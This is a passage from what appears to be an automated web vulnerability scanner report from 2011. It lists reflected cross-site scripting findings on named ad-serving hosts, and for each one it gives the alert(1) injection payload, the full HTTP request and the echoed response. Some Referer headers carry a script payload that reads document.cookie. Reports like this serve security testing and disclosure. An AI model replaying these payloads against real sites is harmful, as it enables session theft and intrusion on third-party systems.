Path:   /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b950"%3balert(1)//36978161dc7 was submitted in the mpvc parameter. This input was echoed as 1b950";alert(1)//36978161dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12309/121202/1331392_Dell_MobilityChallenge_728x90_AS.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r&mpt=%r&mpvc=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=1b950"%3balert(1)//36978161dc7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:42 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 23:20:06 GMT
ETag: "3b3daa-bf5-49ab3f4ef7580"
Accept-Ranges: bytes
Content-Length: 6118
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=i;s=9538;g=172;w=56;m=0;z=8677821385;k=1b950";alert(1)//36978161dc7http://altfarm.mediaplex.com%2Fad%2Fck%2F12309-121202-25586-0%3Fmpt%3D%25r&clickTag=http://o1.qnsr.com//cgi/c?a=20141132;x=3585;c=203695824,203695824;i=0;n=203;s=9538;;;y=http://www.isp-planet.com/;;e=
...[SNIP]...

3.35. http://intranetjournal.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9eced%3balert(1)//957d74fd0a9 was submitted in the jscallback parameter. This input was echoed as 9eced;alert(1)//957d74fd0a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218152936&cc=us&hk=1&ipid=26006&mh=4ccbd227c914fe0ad20c83f2c32d6d2d&pvm=91e816d4e263650ab854db91045f7b68&pvu=221E92B9864D44419082D8D9A665E825&rcc=us&so=0&prf=ll%3A550%7Cintl%3A1818%7Cpreprochrome%3A4%7Cgetconchrome%3A262%7Ccontint%3A38513%7Ccontl%3A40599%7Cadvint%3A1275%7Cadvl%3A41874%7Ctl%3A41874&jscallback=$iTXT.js.callback319eced%3balert(1)//957d74fd0a9 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:29:04 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Fri, 18 Feb 2011 15:29:04 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback319eced;alert(1)//957d74fd0a9();}catch(e){}

3.36. http://intranetjournal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ffa8'-alert(1)-'e8073eb4a9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWIx3QA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:27:39 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:27:39 GMT
Age: 0
Connection: keep-alive
Content-Length: 10605

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152739";})();$iTXT.js.serverUrl='http://intranetjournal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26006&2ffa8'-alert(1)-'e8073eb4a9e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.37. http://intranetjournal.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31dd1%3balert(1)//9f86d76e19c was submitted in the jscallback parameter. This input was echoed as 31dd1;alert(1)//9f86d76e19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042975642&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback3031dd1%3balert(1)//9f86d76e19c HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 156
Date: Fri, 18 Feb 2011 15:29:17 GMT
Age: 0
Connection: keep-alive

(function(){})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback3031dd1;alert(1)//9f86d76e19c();}catch(e){}

3.38. http://intranetjournal.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f6fe4%3balert(1)//4bff4cebd35 was submitted in the jscallback parameter. This input was echoed as f6fe4;alert(1)//4bff4cebd35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042937129&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=63528&jsoncl=26447&ppc=-1&hn=144&chunkkey=26006:4ccbd227c914fe0ad20c83f2c32d6d2d:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Intranet%20Journal's%20new%20discussion%20forum%20lets%20you%20ask%20for%20opinions%2C%20get%20answers%20to%20questions%2C%20and%20discuss%20Intranet%20Journal%20articles.%20%5B%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22Online%20pests%20can%20range%20from%20the%20annoying%20to%20the%20downright%20dangerous.%20This%20Intranet%20Journal%20guide%20takes%20a%20step-by-step%20approach%20to%20diagnosing%2C%20removing%20and%20preventing%20spyware%20infestations.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22For%20six%20months%20in%202004%2C%20Intranet%20Journal's%20Peter%20Zeidman%20published%20a%20tutorial%20on%20using%20the%20PHP%20programming%20language%20to%20build%20a%20content%20management%20system%20(CMS).%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22We've%20developed%20a%20knowledge%20base%20from%20Intranet%20Journal%20articles%20to%20help%20our%20readers%20find%20the%20answer%20to%20common%20questions.%20When%20used%20with%20the%20Intranet%20Journal%20Discussion%20Forum%2C%20our%20How%20Do%20I...%20section%20harnesses%20the%20experience%20of%20Intranet%20Journal%20reader&chunk=0&total=29&jscallback=$iTXT.js.callback1f6fe4%3balert(1)//4bff4cebd35 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:28:55 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1f6fe4;alert(1)//4bff4cebd35();}catch(e){}

3.39. http://intranetjournal.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2fcb1%3balert(1)//84127e4a12 was submitted in the jscallback parameter. This input was echoed as 2fcb1;alert(1)//84127e4a12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback02fcb1%3balert(1)//84127e4a12 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:29:23 GMT
Age: 0
Connection: keep-alive
Content-Length: 6789

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback02fcb1;alert(1)//84127e4a12({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.40. http://intranetjournal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a56"-alert(1)-"0cbe1950df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback0&19a56"-alert(1)-"0cbe1950df3=1 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:29:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 6772

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
|undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"63528","fv":"10","ts":"1298042935593","19a56"-alert(1)-"0cbe1950df3":"1","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","
...[SNIP]...

3.41. http://isp-planet.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8144e%3balert(1)//c0aabcee0cf was submitted in the jscallback parameter. This input was echoed as 8144e;alert(1)//c0aabcee0cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218124834&adid=0%2C373510%2C0%2C0%2C373510%2C373510&cc=us&di=30028492%2C29977856%2C30069772%2C30028503%2C29977871%2C29977857&hk=1&ipid=26025&mh=9e64e9ea6ebafdfc983d191cb3c49a05&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=a214e9824c8aacf40b30520ffa06754c&pvu=CC42539E2EFA4A5E8A9F4A7DDC7AEA6C&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=316%2C479%3B688%2C595%3B207%2C767%3B537%2C1142%3B852%2C1274%3B546%2C1590%3B&prf=ll%3A1886%7Cintl%3A3584%7Cpreprochrome%3A40%7Cgetconchrome%3A110%7Cadvint%3A3735%7Cadvl%3A3735%7Ctl%3A3943&jscallback=$iTXT.js.callback18144e%3balert(1)//c0aabcee0cf HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:51:16 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Fri, 18 Feb 2011 12:51:16 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback18144e;alert(1)//c0aabcee0cf();}catch(e){}

3.42. http://isp-planet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbfda'-alert(1)-'069187f932f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26025&fbfda'-alert(1)-'069187f932f=1 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AAGxQQ1Wo0RyjESJ/pnB21EAADqvAAA66wEAAAEuOM+wMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AJAg5HHA0kpbvkwgdllNuSgAADqvAAA66wEAAAEuOM+wMgA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:47:38 GMT
Age: 0
Connection: keep-alive
Content-Length: 10600

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218124738";})();$iTXT.js.serverUrl='http://isp-planet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26025&fbfda'-alert(1)-'069187f932f=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.43. http://isp-planet.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4ad6%3balert(1)//1ae24b5acbe was submitted in the jscallback parameter. This input was echoed as a4ad6;alert(1)//1ae24b5acbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042884118&refurl=http%3A%2F%2Fwww.isp-planet.com%2Fabout%2Fsitemap.html%3Ffd8e5--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed97a1fbd30c%3D1&sid=38ce1acdaee97bceafab0c5291679b09&pvu=B988269E926D4B129A1A142EE87DC5DB&pvm=e624adf16f3feadf574c1742b8fd1efa&ipid=26025&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=33114&jsoncl=127&ppc=-1&hn=1&chunkkey=26025:38ce1acdaee97bceafab0c5291679b09:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Copyright%202011%20QuinStreet%20Inc.%20All%20Rights%20Reserved.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=1&jscallback=$iTXT.js.callback1a4ad6%3balert(1)//1ae24b5acbe HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:28:03 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1a4ad6;alert(1)//1ae24b5acbe();}catch(e){}

3.44. http://isp-planet.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/init

Issue detail

